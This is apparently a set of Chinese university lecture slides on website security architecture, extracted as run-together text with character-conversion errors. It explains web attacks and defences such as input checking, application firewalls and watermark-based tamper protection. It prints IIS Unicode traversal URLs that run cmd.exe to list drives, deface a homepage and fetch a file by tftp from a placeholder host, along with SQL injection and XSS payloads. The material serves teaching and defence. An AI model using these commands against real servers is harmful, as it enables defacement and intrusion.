BIT7信息系統(tǒng)安全架構(gòu)-網(wǎng)站安全架構(gòu)

網(wǎng)站平安體系架構(gòu)孫建偉北京理工大學(xué)軟件學(xué)院提綱網(wǎng)站工作原理網(wǎng)站架構(gòu)網(wǎng)站與瀏覽器的交互Web應(yīng)用攻擊網(wǎng)頁篡改注入式攻擊跨站攻擊Web應(yīng)用平安體系架構(gòu)分析輸入驗證網(wǎng)站備份恢復(fù)架構(gòu)立體防護(hù)體系Web應(yīng)用程序的邏輯架構(gòu)三層架構(gòu)(3-tierapplication)通常意義上的三層架構(gòu)就是將整個業(yè)務(wù)應(yīng)用劃分為：表現(xiàn)層〔UI〕、業(yè)務(wù)邏輯層〔BLL〕、數(shù)據(jù)訪問層〔DAL〕。區(qū)分層次的目的即為了“高內(nèi)聚，低耦合”的思想。１、表現(xiàn)層〔UI〕：通俗講就是展現(xiàn)給用戶的界面，即用戶在使用一個系統(tǒng)的時候他的所見所得。２、業(yè)務(wù)邏輯層〔BLL〕：針對具體問題的操作，也可以說是對數(shù)據(jù)層的操作，對數(shù)據(jù)業(yè)務(wù)邏輯處理。３、數(shù)據(jù)訪問層〔DAL〕：該層所做事務(wù)直接操作數(shù)據(jù)庫，針對數(shù)據(jù)的增、刪、改、查。網(wǎng)站的層次結(jié)構(gòu)操作系統(tǒng)：管理計算機(jī)平臺資源Web效勞器：解析HTTP請求，處理網(wǎng)頁文件，執(zhí)行動態(tài)腳本網(wǎng)站文件系統(tǒng)靜態(tài)網(wǎng)頁動態(tài)網(wǎng)頁后臺數(shù)據(jù)庫4HTTP工作原理因特網(wǎng)HTTP使用此TCP連接瀏覽器程序效勞器程序HTTP客戶建立TCP連接釋放TCP連接

HTTP響應(yīng)報文②響應(yīng)文檔

HTTP請求報文①請求文檔(1)瀏覽器分析超鏈指向頁面的URL。(2)瀏覽器向DNS請求解析的IP地址。(3)域名系統(tǒng)DNS解析出清華大學(xué)效勞器的IP地址。(4)瀏覽器與效勞器建立TCP連接(5)瀏覽器發(fā)出取文件命令：GET/chn/yxsz/index.htm。(6)效勞器對此請求給出響應(yīng)，把文件index.htm發(fā)給瀏覽器。(7)TCP連接釋放。(8)瀏覽器顯示文件index.htm中的所有文本。Web訪問工作原理Web訪問工作原理瀏覽器結(jié)構(gòu)與遠(yuǎn)地效勞器通信輸出至顯示器從鼠標(biāo)和鍵盤輸入網(wǎng)絡(luò)接口可選客戶程序HTML解釋程序可選解釋程序控制程序驅(qū)動程序……HTTP客戶程序緩存9效勞器端技術(shù)實現(xiàn)原理Web瀏覽器Web效勞器HTTP請求HTTP響應(yīng)本地磁盤獲取請求頁1.檢查網(wǎng)頁是否是動態(tài)網(wǎng)頁2.如果是那么運行其中的效勞器端程序3.生成靜態(tài)網(wǎng)頁發(fā)送到客戶端10網(wǎng)站成為網(wǎng)絡(luò)攻擊的焦點操作系統(tǒng)的復(fù)雜性已公布超過1萬多個系統(tǒng)漏洞Web效勞器的漏洞網(wǎng)站應(yīng)用漏洞網(wǎng)站配置的問題網(wǎng)站系統(tǒng)設(shè)計缺乏平安性架構(gòu)的支持網(wǎng)頁的平安性設(shè)計不夠注入式攻擊多個應(yīng)用系統(tǒng)不同的開發(fā)者，組織的缺陷

10Web攻擊事件-篡改網(wǎng)頁11Web攻擊事件-篡改數(shù)據(jù)12Web攻擊事件-跨站攻擊13Web攻擊事件-注入式攻擊14Web攻擊事件-非法上傳15://news.sohu/a.txt常見Web攻擊類型威脅手段后果注入式攻擊通過構(gòu)造SQL語句對數(shù)據(jù)庫進(jìn)行非法查詢黑客可以訪問后端數(shù)據(jù)庫，偷竊和修改數(shù)據(jù)跨站腳本攻擊通過受害網(wǎng)站在客戶端顯不正當(dāng)?shù)膬?nèi)容和執(zhí)行非法命令黑客可以對受害者客戶端進(jìn)行控制，盜竊用戶信息上傳假冒文件繞過管理員的限制上傳任意類型的文件黑客可以篡改網(wǎng)頁、圖片和下載文件等不安全本地存儲偷竊cookie和sessiontoken信息黑客獲取用戶關(guān)鍵資料，冒充用戶身份非法執(zhí)行腳本執(zhí)行系統(tǒng)默認(rèn)的腳本或自行上傳的WebShell腳本等黑客完全控制服務(wù)器非法執(zhí)行系統(tǒng)命令利用Web服務(wù)器漏洞上執(zhí)行Shell命令Execute等黑客獲得服務(wù)器信息源代碼泄漏利用Web服務(wù)器漏洞或應(yīng)用漏洞獲得腳本源代碼黑客分析源代碼從而更有針對性的對網(wǎng)站攻擊URL訪問限制失效黑客可以訪問非授權(quán)的資源連接黑客可以強(qiáng)行訪問一些登陸網(wǎng)頁、歷史網(wǎng)頁16攻擊手段例如之一Unicode漏洞漏洞選介Unicode漏洞微軟的IIS在Unicode字符解碼的實現(xiàn)中存在一個平安漏洞，導(dǎo)致用戶可以遠(yuǎn)程通過IIS執(zhí)行任意命令可以復(fù)制、刪除、列目錄、系統(tǒng)配置等任何人利用普通瀏覽器即可發(fā)起攻擊存在于WindowsNT/2000(IIS4.0/5.0)中2001年初發(fā)現(xiàn)，2001年8月修復(fù)18漏洞原理IIS對特殊字符URL請求的解碼錯誤%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c='/'%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f='\'構(gòu)造含有特殊字符的URL請求繞過IIS的路徑檢查可以執(zhí)行或翻開任意文件19測試方法測試URL://badou/scripts/..%u00255c../winnt/system32/cmd.exe?/c+dir+d:\badou是任意一臺〔未打補(bǔ)丁的〕Windows2000主機(jī)的IIS效勞器返回結(jié)果目標(biāo)主機(jī)D盤下的文件目錄20利用漏洞列目錄21利用漏洞進(jìn)行攻擊簡單修改主頁在首頁內(nèi)添加文字“導(dǎo)彈襲擊”://badou/scripts/..%u00255c../winnt/system32/cmd.exe?/c+echo+導(dǎo)彈襲擊+>c:\inetpub\wwwroot\default.htm上傳非法頁面用tftp工具將hack.htm上傳到目標(biāo)主機(jī)://badou/scripts/..%u00255c../winnt/system32/cmd.exe?/c+tftp-iy.y.y.yGETc:\\inetpub\\wwwroot\\hack.htm22注入式攻擊注入式攻擊全稱為“SQL注入式攻擊”攻擊者利用網(wǎng)站動態(tài)網(wǎng)頁程序設(shè)計上的漏洞，在目標(biāo)的Web效勞器上運行SQL命令繞過登錄身份檢查、獲得系統(tǒng)管理員密碼、非法獲取數(shù)據(jù)、非法篡改數(shù)據(jù)、生成非法文件、非法執(zhí)行命令等24漏洞原理攻擊者在表單輸入或者URL請求中發(fā)送SQL語句片斷，期望通過Web應(yīng)用腳本合成為帶有攻擊目的的SQL語句應(yīng)用腳本：ASP、JSP、PHP數(shù)據(jù)庫：一切支持SQL的數(shù)據(jù)庫系統(tǒng)

SQL注入機(jī)理分析

數(shù)據(jù)庫應(yīng)用程序服務(wù)器客戶端（瀏覽器）請求

響應(yīng)

查詢

結(jié)果集

SQL注入機(jī)理分析〔續(xù)〕

//構(gòu)建SQL查詢語句=“SELECTnameFROMtbUserInfoWHEREid=(用戶輸入的數(shù)據(jù))”

用戶名：wc’

or1=1--密碼：xxxxSELECTnameFROMtbUserInfoWHEREid=’wc’

or1=1--

SQL注入攻擊的一般過程

探測注入點確定數(shù)據(jù)庫類型和版本猜解數(shù)據(jù)庫結(jié)構(gòu)確定當(dāng)前用戶權(quán)限提取信息篡改數(shù)據(jù)…發(fā)起高級攻擊使用特定存儲過程遍歷目錄結(jié)構(gòu)…修改注冊碼…

SQL注入攻擊的特點

SQL注入是從正常的WWW端口〔80端口〕訪問，外表看起來跟一般的web頁面訪問沒什么區(qū)別SQL注入漏洞是一個入口，攻擊者通過它可以發(fā)動更高級的攻擊，例如控制目標(biāo)系統(tǒng)。隱蔽性后果嚴(yán)重性使用黑客工具NBSIHDSIDomainX-ScanPangolin30攻擊手段例如之三跨站攻擊防跨站攻擊例如應(yīng)用系統(tǒng)未對瀏覽器輸入的參數(shù)進(jìn)行檢查和處理，直接返回給用戶的瀏覽器。Bank請輸入轉(zhuǎn)賬金額：Bank轉(zhuǎn)賬成功！URL:轉(zhuǎn)賬成功!Bank銀行破產(chǎn)！URL::///result.asp?info=銀行破產(chǎn)!Xxx’sblog:bank宣布破產(chǎn)請點擊官方鏈接10000確定1.正常業(yè)務(wù)2.跨站攻擊跨站攻擊還能做什么在客戶端執(zhí)行腳本JavaScriptVBScript偷取和仿冒用戶身份和信息cookiesession向其他站點提交信息跳轉(zhuǎn)到其他站點33對策配置和管理配置網(wǎng)絡(luò)和主機(jī)編寫平安的應(yīng)用程序平安掃描模擬滲透工具代碼復(fù)查工具平安防護(hù)網(wǎng)頁完整性檢查應(yīng)用防火墻34應(yīng)用程序平安設(shè)計原那么權(quán)限區(qū)域劃分使用最少的特權(quán)應(yīng)用深入的防御手段不要信任用戶的輸入在網(wǎng)關(guān)處進(jìn)行檢查出現(xiàn)故障時的平安性保證最脆弱的鏈接的平安創(chuàng)立平安的默認(rèn)值減小受攻擊的范圍35應(yīng)用程序平安關(guān)注點“如何平安地處理異常？”“如何保證開發(fā)人員工作站的平安性？”“如何編寫具有最低權(quán)限的代碼？”“如何限制文件I/O？”“如何防止SQL注入？”“如何防止跨站點腳本編寫？”“如何管理機(jī)密？”“如何平安調(diào)用非托管代碼？”“如何執(zhí)行托管代碼的平安復(fù)查？”“如何執(zhí)行平安的輸入驗證？”“如何保證窗體身份驗證的平安性？”36防范注入式攻擊檢查用戶輸入關(guān)鍵字過濾強(qiáng)數(shù)據(jù)類型效勞器端檢查最小權(quán)限原那么使用存儲過程使用parameters對象控制錯誤信息回顯37防范跨站攻擊檢查用戶輸入<script>alert('xss')</script><imgsrc="javascript:alert(/xss/)"><imgsrc="javascript:alert(/xss/)"><imgsrc="javascript:alert(/xss/)"><imgsrc="#"onerror=alert(/xss/)><imgsrc=”javascriSS');”/>檢查請求頭中的referer38應(yīng)用平安掃描測試方法黑盒測試〔滲透和黑客工具〕白盒測試〔代碼和開發(fā)生命周期〕產(chǎn)品AppScan(IBM)WebInspect(HP)N-Stalker(N-Stalker)Acunetix(Acunetix)MatriXay(亞龍安恒,dbappsecurity)WebRavor(安域領(lǐng)創(chuàng),SecDomain)39應(yīng)用平安防護(hù)網(wǎng)頁防篡改系統(tǒng)保護(hù)網(wǎng)頁和腳本的完整性平安容忍類產(chǎn)品iGuard應(yīng)用防火墻防止針對主機(jī)和應(yīng)用程序的威脅平安防護(hù)類產(chǎn)品華誠ImpervaiWall40網(wǎng)頁防篡改系統(tǒng)設(shè)計思路網(wǎng)站工作的流程Web效勞器收聽請求解析url查找url對應(yīng)的網(wǎng)頁文件對于靜態(tài)網(wǎng)頁文件,發(fā)送給客戶端;對于動態(tài)網(wǎng)頁文件,效勞器端執(zhí)行腳本,生成頁面文件發(fā)送給客戶端.網(wǎng)頁防篡改系統(tǒng)設(shè)計思路網(wǎng)站備份恢復(fù)結(jié)構(gòu)設(shè)計網(wǎng)站文件備份網(wǎng)站文件在處理前先做完整性校驗通過Hook函數(shù)修改web效勞器〔IIS〕，擴(kuò)展完整性校驗功能校驗不通過，那么從備份系統(tǒng)中恢復(fù)造篡改的文件為加速完整性校驗，采用數(shù)字摘要技術(shù)預(yù)先生成原始文件的摘要〔數(shù)字水印〕實時比對網(wǎng)頁防篡改系統(tǒng)設(shè)計思路網(wǎng)站備份恢復(fù)結(jié)構(gòu)處理流程Web效勞器收聽請求解析url查找url對應(yīng)的網(wǎng)頁文件讀取網(wǎng)頁文件后，做完整性校驗校驗不通過，那么從備份中恢復(fù)對于靜態(tài)網(wǎng)頁文件,發(fā)送給客戶端;對于動態(tài)網(wǎng)頁文件,效勞器端執(zhí)行腳本,生成頁面文件發(fā)送給客戶端.Web核心內(nèi)嵌模塊44硬件平臺〔X86/sparc/ItaniumII/PowerPC/PA-RISC〕操作系統(tǒng)〔Windows/Linux/FreeBSD/Solaris/AIX/HP-UX〕Web效勞器軟件(IIS/Apache/Weblogic/Websphere)平安核心內(nèi)嵌模塊requestresponse應(yīng)用防護(hù)技術(shù)數(shù)字水印技術(shù)Web效勞器防篡改技術(shù)45發(fā)布效勞器Web效勞器FTP/rsync一般發(fā)布過程篡改檢測模塊自動發(fā)布

子系統(tǒng)監(jiān)控和恢復(fù)

子系統(tǒng)+篡改檢測

子系統(tǒng)SSL1.上傳正常網(wǎng)頁=X水印庫2.瀏覽正常網(wǎng)頁3.篡改網(wǎng)頁4.瀏覽篡改網(wǎng)頁5.自動恢復(fù)文件系統(tǒng)工作過程發(fā)布過程發(fā)布內(nèi)嵌模塊檢測到文件創(chuàng)立/變化為文件產(chǎn)生加密和不可逆轉(zhuǎn)數(shù)字水印通過加密通道傳送到Web效勞器檢測過程公眾發(fā)出請求瀏覽網(wǎng)頁應(yīng)用防護(hù)子系統(tǒng)檢查請求的合法性頁面保護(hù)子系統(tǒng)檢查數(shù)字水印完整性其它網(wǎng)頁篡改防護(hù)的技術(shù)路線外掛輪詢制作網(wǎng)站備份定期抓取網(wǎng)頁與相應(yīng)的備份網(wǎng)頁比對特點:可以是后臺或前臺無法做到實時恢復(fù)其它網(wǎng)頁篡改防護(hù)的技術(shù)路線文件保護(hù)〔事件觸發(fā)〕改造操作系統(tǒng)文件管理功能，監(jiān)控和阻斷文件寫操作只有特權(quán)帳戶才能作寫操作Web效勞器帳戶權(quán)限只有讀取權(quán)限特點:權(quán)限管理過于嚴(yán)格限制了web效勞器功能，不能適應(yīng)Web2.0技術(shù)的要求網(wǎng)頁防篡改技術(shù)比較外掛輪詢核心內(nèi)嵌事件觸發(fā)訪問篡改網(wǎng)頁可能不可能可能動態(tài)網(wǎng)頁防護(hù)不支持支持不支持服務(wù)器負(fù)載中低極低帶寬占用中無無檢測時間分鐘級實時毫秒繞過檢測機(jī)制不可能不可能可能防范連續(xù)篡改不能支持不支持?jǐn)嗑€時檢測不能能不能適用操作系統(tǒng)所有所有受限

Web效勞器內(nèi)置的其它防護(hù)功能同完整性校驗功能的實現(xiàn)類似，web效勞器在結(jié)構(gòu)上可以擴(kuò)展其它防護(hù)模塊SQL參數(shù)的校驗處理用戶提交數(shù)據(jù)中惡意腳本的檢查過濾上述處理功能也可以在防火墻平臺上實現(xiàn)不適用于HTTPS模式防注入攻擊SELECT*FROMuserWHEREname=‘hack’or‘1’=‘1’SELECT*FROMuserWHEREname=‘zhangsan’XOWeb效勞器軟件應(yīng)用防護(hù)模塊輸入用戶名：zhangsan輸入用戶名：hack’or‘1’=‘1’or‘1.正常訪問2.注入攻擊防跨站攻擊例如52Bank請輸入轉(zhuǎn)賬金額：Bank轉(zhuǎn)賬成功！URL:轉(zhuǎn)賬成功!Bank銀行破產(chǎn)！URL::///result.asp?info=銀行破產(chǎn)!Xxx’sblog:bank宣布破產(chǎn)請點擊官方鏈接URL:10000確定???X1.正常業(yè)務(wù)2.跨站攻擊3.應(yīng)用防護(hù)應(yīng)用防火墻實現(xiàn)方式比較項目軟件實現(xiàn)方式硬件實現(xiàn)方式部署點Web服務(wù)器網(wǎng)關(guān)網(wǎng)絡(luò)配置無須改變須改變訪問性能影響